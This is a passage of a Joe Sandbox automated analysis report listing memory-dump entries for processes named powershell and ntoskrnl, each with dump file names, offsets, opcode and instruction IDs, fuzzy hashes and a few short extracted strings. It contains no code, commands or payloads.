                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b0cdfd9595e82fd4cd9cf88f8f5513bd22ad3aa30512f0cb9d87b5ac3890add
                                                                                • Instruction ID: 533517b21f00d11fb32938a8be28c474d5221e97a9f8b3052c43e8f7b3bc1622
                                                                                • Opcode Fuzzy Hash: 6b0cdfd9595e82fd4cd9cf88f8f5513bd22ad3aa30512f0cb9d87b5ac3890add
                                                                                • Instruction Fuzzy Hash: 4C41297190EB885FDB189F5C9C4A6B97BE0FB55310F04426FE099932A2CA64A815CBC6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2248479312.00007FFD9B65D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B65D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b65d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aef2a57f0a7e529a3ed8c6ccb830e5e2c283cc53a4b04c0d76c29c0eeda6f59c
                                                                                • Instruction ID: 0f398a16fbbd4ec32f1552d3cffea2e18a15cd128548cbf1bdd6f872f82e68ae
                                                                                • Opcode Fuzzy Hash: aef2a57f0a7e529a3ed8c6ccb830e5e2c283cc53a4b04c0d76c29c0eeda6f59c
                                                                                • Instruction Fuzzy Hash: 7B415A7180EBC84FEB668B7898519623FF0EF52321B1601DFD0C9CB1A3D625B846C792
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 43d7513a7c7cabace86a91835aba9adfecfd485a66d02e3bf8a8306cb777e677
                                                                                • Instruction ID: 0bd571f0c1bd943128652d8c8018b4d941fc06b0110b569e8c02b54ce5cd0a20
                                                                                • Opcode Fuzzy Hash: 43d7513a7c7cabace86a91835aba9adfecfd485a66d02e3bf8a8306cb777e677
                                                                                • Instruction Fuzzy Hash: 00212B3190C74C4FEB59DBAC9C4A7E97FE0EB56321F04426FD048C3162DA74A815CB91
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction ID: a855e341a462274d49eabc0e16f816d0981cb0317f9cc1d8a1f2f3ba92cc05e1
                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                • Instruction Fuzzy Hash: EA01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58EC36A1DA32E882CB41
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                                • Instruction ID: 3df613910222723f5189684d85f77e1752c27ae1f4e7343bebd7535f50083bae
                                                                                • Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                                • Instruction Fuzzy Hash: DEF09A32B0E9098FD769EB4CE4518A873E1EF5932072600BAE06DC71B3CA25EC408740
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                                • Instruction ID: e8015127403ef007c02cc68ef27310f3601c016a9255f4d2daad8dfb329b25f2
                                                                                • Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                                • Instruction Fuzzy Hash: 3CF0BE32B0E5498FD764EB4CE0608A877E0FF0832072600BAE159C74A3DA25AC40C740
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2251027426.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction ID: cdab32a5d8804fbfaa35fd86f79cc5e0cbc80fc2a89f23c2f1827656015b2d24
                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                • Instruction Fuzzy Hash: 52E01A31B0C8088FDA78DB4CE0519A973E2EB9D32171601BBD14EC7571CA22ED518B80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2249805955.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ffd9b770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                • API String ID: 0-962139525
                                                                                • Opcode ID: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                                                                • Instruction ID: d8f2d668ba550f6bb5f90de6853ea059a4e98626e5724acab21802a74eecdc5f
                                                                                • Opcode Fuzzy Hash: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
                                                                                • Instruction Fuzzy Hash: A021D477B445258ED30636ADB8519EC7781DF6437938A03F3F029CF193EE18A48B8A81
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5326ccee74dcfbd2eb472fc934364e188481198597022111ec3df0817b53b72
                                                                                • Instruction ID: 65f6f2d2dcbb4ef8984bcf2ac0e9dc9085c17e53773add8de79cea89cdebb0f7
                                                                                • Opcode Fuzzy Hash: d5326ccee74dcfbd2eb472fc934364e188481198597022111ec3df0817b53b72
                                                                                • Instruction Fuzzy Hash: 1B52ED65F19A494FE798EB784479BBD77D2FF98300F5406B9E04EC32E6DE2868018742
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ccedf42e0e3328675ff3ce0d3914983024d27f2c2a8f4576d52cf63e86438b95
                                                                                • Instruction ID: 119b7883ba6ffef27a1c72f03c0c5c5565a99660cee11c4b01bc2eb826b5fc8b
                                                                                • Opcode Fuzzy Hash: ccedf42e0e3328675ff3ce0d3914983024d27f2c2a8f4576d52cf63e86438b95
                                                                                • Instruction Fuzzy Hash: 2F51FB10A1E6C98FD79AABB848746657FE4DF87219B0901FBE099C61EBDD085906C342
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 605164989c4f8253f09876456fe87f6b7c020462ba9b903f6811abba13c47402
                                                                                • Instruction ID: d02970f1b2bfe042537652aa6e532ba6904719f37f9aa6952ff91b749091e840
                                                                                • Opcode Fuzzy Hash: 605164989c4f8253f09876456fe87f6b7c020462ba9b903f6811abba13c47402
                                                                                • Instruction Fuzzy Hash: 40412436E0EA8A4FD715EBA894751ED7BB1EF91210B0402FBD09ACA5F3DD2829458351
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50bcb7f87f5f7b86c12606bd7d805c681da2a2855d1d186f47fbfca01be837b4
                                                                                • Instruction ID: 9b95e37ce45bf8292f443afa76891741e98c64d1e5c2083d4055f618937aef13
                                                                                • Opcode Fuzzy Hash: 50bcb7f87f5f7b86c12606bd7d805c681da2a2855d1d186f47fbfca01be837b4
                                                                                • Instruction Fuzzy Hash: B2310122A09A8E4FDB559BA8C8791ED7BB1EFA4240F0402BBC04AD36F2DD2829058341
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7243a80b4d02983903ebbcc3e3fd2f5184ac1770cd22e16b3c51fde26e481b2e
                                                                                • Instruction ID: 8787d22e8c953afce32f6675c552a24bb5f7023ba4e12f248938b59f69309215
                                                                                • Opcode Fuzzy Hash: 7243a80b4d02983903ebbcc3e3fd2f5184ac1770cd22e16b3c51fde26e481b2e
                                                                                • Instruction Fuzzy Hash: E5512921B0E68A0FE356A77C48656B53BE1DF8621474901FBD08DC71EBDC1C9C438352
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eb8c95e46903a53f2c6b3a618a0146fc02bc95c68e7f8f4483d95750dccb1215
                                                                                • Instruction ID: 3ad9f8253e59f12783a1ce8a772054ae3cb5d948fa1063a76bc4cdda14329a6a
                                                                                • Opcode Fuzzy Hash: eb8c95e46903a53f2c6b3a618a0146fc02bc95c68e7f8f4483d95750dccb1215
                                                                                • Instruction Fuzzy Hash: CF51293AB4969A8FD304EB6CA0F19ED3BA1EFD0214B5045F6E04DC73DBDD2864458B91
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a71f0f460db0957b20e568723693a37572d9d08325c1e81aab85f68a0f63c6c
                                                                                • Instruction ID: ab3b92594c63996e1dc0eec5cf56f6fb0ef0cd282c1bf235de9f550e788600de
                                                                                • Opcode Fuzzy Hash: 3a71f0f460db0957b20e568723693a37572d9d08325c1e81aab85f68a0f63c6c
                                                                                • Instruction Fuzzy Hash: EF513736B09A5E8FDB44EBB8D8616ED77E1FFD4310B5005BAD00DC72D6CE28A8468780
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 16d803f37e2b0a7abc4b4d825329fe5da77fc026e25c71f6b8cfed04ed1594ac
                                                                                • Instruction ID: bc082ef55ed239aa799e5ff134af9df832aec3300919967fe40f050942be4c1c
                                                                                • Opcode Fuzzy Hash: 16d803f37e2b0a7abc4b4d825329fe5da77fc026e25c71f6b8cfed04ed1594ac
                                                                                • Instruction Fuzzy Hash: EF31A021B1C9494FE798EB6C886A779B6C2EFD9315F0501BAA04EC32EBDD64AC418341
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
                                                                                • Instruction ID: d0906da9b39b0cab91528258c5f228e1e77b1464a7a356e435750e707c5741fd
                                                                                • Opcode Fuzzy Hash: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
                                                                                • Instruction Fuzzy Hash: 2431F615B18A094FE794BBBC58697BDB6D2EFD8711F1402BAE00DC32DBDE286D414382
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2329644138.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a5febea80853cb0bebaf20adc2948a677a907d286376b520b1a14b5f09f882d4
                                                                                • Instruction ID: 0401ff744aa072e0f8388b6e1424d5b6558c81a48fb310f84f72af9fc964aa24
                                                                                • Opcode Fuzzy Hash: a5febea80853cb0bebaf20adc2948a677a907d286376b520b1a14b5f09f882d4
                                                                                • Instruction Fuzzy Hash: AE214621F0DB894FE791AB6CA861534BBD0DF8A215B0906F7E48CC71F7ED14AD418382
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cbf85433e7f43fc377c7f1d8270a35da6514ca75ac24a3f2b5d49b3a850684f9
                                                                                • Instruction ID: a5bcc22570f461ac3e2f755ef2d6f7f2835706f458def25e704ebb8e38d06b67
                                                                                • Opcode Fuzzy Hash: cbf85433e7f43fc377c7f1d8270a35da6514ca75ac24a3f2b5d49b3a850684f9
                                                                                • Instruction Fuzzy Hash: 9A52BB25F19E494FE758EB788479ABD77D2FF98300F450679E05EC32E6DE28A8018742
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e3a2a7e17a77317f58908fdce704dd6a06a6a977e568ef541cc3d2ab1ca65bc
                                                                                • Instruction ID: d5fe852673e9875f55ad4147a7f1c85a7245d73961fb24168b73b819f69ba91b
                                                                                • Opcode Fuzzy Hash: 0e3a2a7e17a77317f58908fdce704dd6a06a6a977e568ef541cc3d2ab1ca65bc
                                                                                • Instruction Fuzzy Hash: 6A51FB10A1E6C98FD79AABB848746757FE4DF87219B0901FBE099C61EBDD085906C342
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 129389bb4f7e16549b6bf64cdf2fc8e84befc090d481694fcbe7629b9d360d0d
                                                                                • Instruction ID: e1232efec93e0891275f5f546104fdd5a3fc1c1d7d2d40a7814bc7ddc122c7c7
                                                                                • Opcode Fuzzy Hash: 129389bb4f7e16549b6bf64cdf2fc8e84befc090d481694fcbe7629b9d360d0d
                                                                                • Instruction Fuzzy Hash: 9A413536A0EB4A4FD715EBA894790ED7BB1EF91210B0402BBD09ACB5F3DD2829458351
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eb63d16e37569ae23694a95ebbc2568685041d7b8a0fcffb37bc02281b0bb1a5
                                                                                • Instruction ID: f0f291d4363406782e21ad50ba418229ffa665410f669840e1864a108ebab0e3
                                                                                • Opcode Fuzzy Hash: eb63d16e37569ae23694a95ebbc2568685041d7b8a0fcffb37bc02281b0bb1a5
                                                                                • Instruction Fuzzy Hash: 6B31E432A09A4E4FDB54DBA8C8791ED7BB1FF94241F0402BAD05AD76F2DD282D05C351
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c6f9f972fcecdbcf9aaf092b7731d6b062a5a8bd79adb24bd91952f0f0cb6a9
                                                                                • Instruction ID: 24a803601049654cd5301410e96364343e29f95020c8707ce9c3545f36a9437a
                                                                                • Opcode Fuzzy Hash: 6c6f9f972fcecdbcf9aaf092b7731d6b062a5a8bd79adb24bd91952f0f0cb6a9
                                                                                • Instruction Fuzzy Hash: D0511921B0EA8A0FE366A77C48656B53BE1DF86214B4941FBD48DC71EBDC189C478352
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bbad763fdc5b32d6a791eeb21f857fc463d0c6072077ea47772006847ff3052
                                                                                • Instruction ID: a5a43bb2ae3237fccf5a769b469e18a5613e3384b7460f4f5890c03266ec24cf
                                                                                • Opcode Fuzzy Hash: 8bbad763fdc5b32d6a791eeb21f857fc463d0c6072077ea47772006847ff3052
                                                                                • Instruction Fuzzy Hash: 1251293AB49A4A8FD318E76CA0B59FD3BA1EF80614B4045FAE089C73DBDD24A4458791
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0afdcce0717322fc5730b6e665a1a172b47001a9ae31792411748a2c28c3c3f
                                                                                • Instruction ID: 3e8bdc0755b4c12a8f95d4115232b7f46770a03eee347ed1988a4e964567eb39
                                                                                • Opcode Fuzzy Hash: a0afdcce0717322fc5730b6e665a1a172b47001a9ae31792411748a2c28c3c3f
                                                                                • Instruction Fuzzy Hash: F5512736B19A1E8FDB44EBB8D8656ED77E1FFD4311F4405BAD009C72D6CE24A8468780
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20449972d92f167ef88f5540cfb4d32d62191dfd426f0f95c7fff91aebac3ff6
                                                                                • Instruction ID: 6b26191c3f91c364e8d04b3fefefdae9dfda7fa5a8837659e47f53e123b37521
                                                                                • Opcode Fuzzy Hash: 20449972d92f167ef88f5540cfb4d32d62191dfd426f0f95c7fff91aebac3ff6
• Instruction Fuzzy Hash: D431B121B1C94D4FE798EB6C886A779B6C2EFD8315F0501BEA04EC32EBDD64AC418341

Memory Dump Source
• Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
• Instruction ID: d0906da9b39b0cab91528258c5f228e1e77b1464a7a356e435750e707c5741fd
• Opcode Fuzzy Hash: 50d1394aa99f28cd7a1916ceb930358f9c4844ffaad47f071dd65b402af09450
• Instruction Fuzzy Hash: 2431F615B18A094FE794BBBC58697BDB6D2EFD8711F1402BAE00DC32DBDE286D414382

Memory Dump Source
• Source File: 00000010.00000002.2392942374.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffd9b760000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 79a57ecfc6bded54a2c12a5ca4fa3a99829c02392db38b3d7ed89b1c18d77693
• Instruction ID: ee083a48bd37ca3dfa871464a2faf5a7c633cfd6ef58a3042916e31d0240eaad
• Opcode Fuzzy Hash: 79a57ecfc6bded54a2c12a5ca4fa3a99829c02392db38b3d7ed89b1c18d77693
• Instruction Fuzzy Hash: 2F214621B0DB894FE791AB6CA865534BBD0DF8A214B0906F7E489C71F7ED14AD418382

Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214
• Opcode ID: 04f150e50e2ea0365bd974b98928e19542a3af90f1147f8276e65596dc7866fb
• Instruction ID: 98c0feddc7ce07cd6deb698d698e54be86566b178fb512a11c45be0531c2a176
• Opcode Fuzzy Hash: 04f150e50e2ea0365bd974b98928e19542a3af90f1147f8276e65596dc7866fb
• Instruction Fuzzy Hash: C052B821B19A494FE768EB7884B5ABD77D2FF98301F4506BDE01EC32E6DD3868418741

Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: a7d80c5e3b7c683340bf5ca2db09c523db0fef244c67c70117f1114ddd8389ab
• Instruction ID: 1dc96e6a2b4fb1f8b93809879066630b624778a806f5b506270eb90c185c2b52
• Opcode Fuzzy Hash: a7d80c5e3b7c683340bf5ca2db09c523db0fef244c67c70117f1114ddd8389ab
• Instruction Fuzzy Hash: 5151FE10B1EAC94FD796ABB848B46657FD4DF8722AB0901FBE09DC71E7DD281906C342

Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214
• Opcode ID: 6a515a7d071262c0a096c6a651e734ba8bd4c4a72d96ad83a46fc8d052fae3fc
• Instruction ID: 28e3e9e3385296732e638067020fe344dd8acd93b086b9bedccd344c588413dc
• Opcode Fuzzy Hash: 6a515a7d071262c0a096c6a651e734ba8bd4c4a72d96ad83a46fc8d052fae3fc
• Instruction Fuzzy Hash: 5F412735B19A1E8FDB44EBB8D865AED77A1FF95311F5402BAD009C32D6CE3864468B80

Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214
• Opcode ID: 684ee668e9a47a13c95011985f06114fa2609e62c7570513f0643524be0dcc61
• Instruction ID: 71f8ada2dbfc26f58be167f44af6e1dfdc8450830f025bcd577239d3cbd8fdf8
• Opcode Fuzzy Hash: 684ee668e9a47a13c95011985f06114fa2609e62c7570513f0643524be0dcc61
• Instruction Fuzzy Hash: E4514836B595494FD308EB6CE0B19FD3B61EF80315B9542FAE05E873DBDE2864818B80

Strings
Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID: V
• API String ID: 0-1342839628
• Opcode ID: 14f23b97031294d16da545dd3846cd271c635606ab792a0b211a7985ba4f9a3f
• Instruction ID: 347741754c34c1e8c3d1f204562b3db8a785afa2e13db657d4c46e854b344eb4
• Opcode Fuzzy Hash: 14f23b97031294d16da545dd3846cd271c635606ab792a0b211a7985ba4f9a3f
• Instruction Fuzzy Hash: 5F019E10A1DF850FE756A73858B55757FE0CFC1216B0805FBE888CA0F7E8186A448391

Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 832b3591998e5885a9e1649d026d7a42e07a9898e282c51c0cf90ac6c6de5eb5
• Instruction ID: a620555decdd706fcbb18fd0a3cad41e5a2ae2ed08dce8bae8cfda6bf8db40a0
• Opcode Fuzzy Hash: 832b3591998e5885a9e1649d026d7a42e07a9898e282c51c0cf90ac6c6de5eb5
• Instruction Fuzzy Hash: 0D41B222A0AB4E4FD755ABA898B50FD7BB1EF55211B0902FBD09AC65E3DE2829058740

Memory Dump Source
• Source File: 00000011.00000002.2477573799.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffd9b780000_ntoskrnl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e326f9deb4fc4b8c420ff1b3bb9f398bd55b0302fcd0571ac691bcfdf3df834c
• Instruction ID: e83b49ae59e60082e1b5393a5d4a6e3c912370f4bf0336ece38a5575ebda6b7f
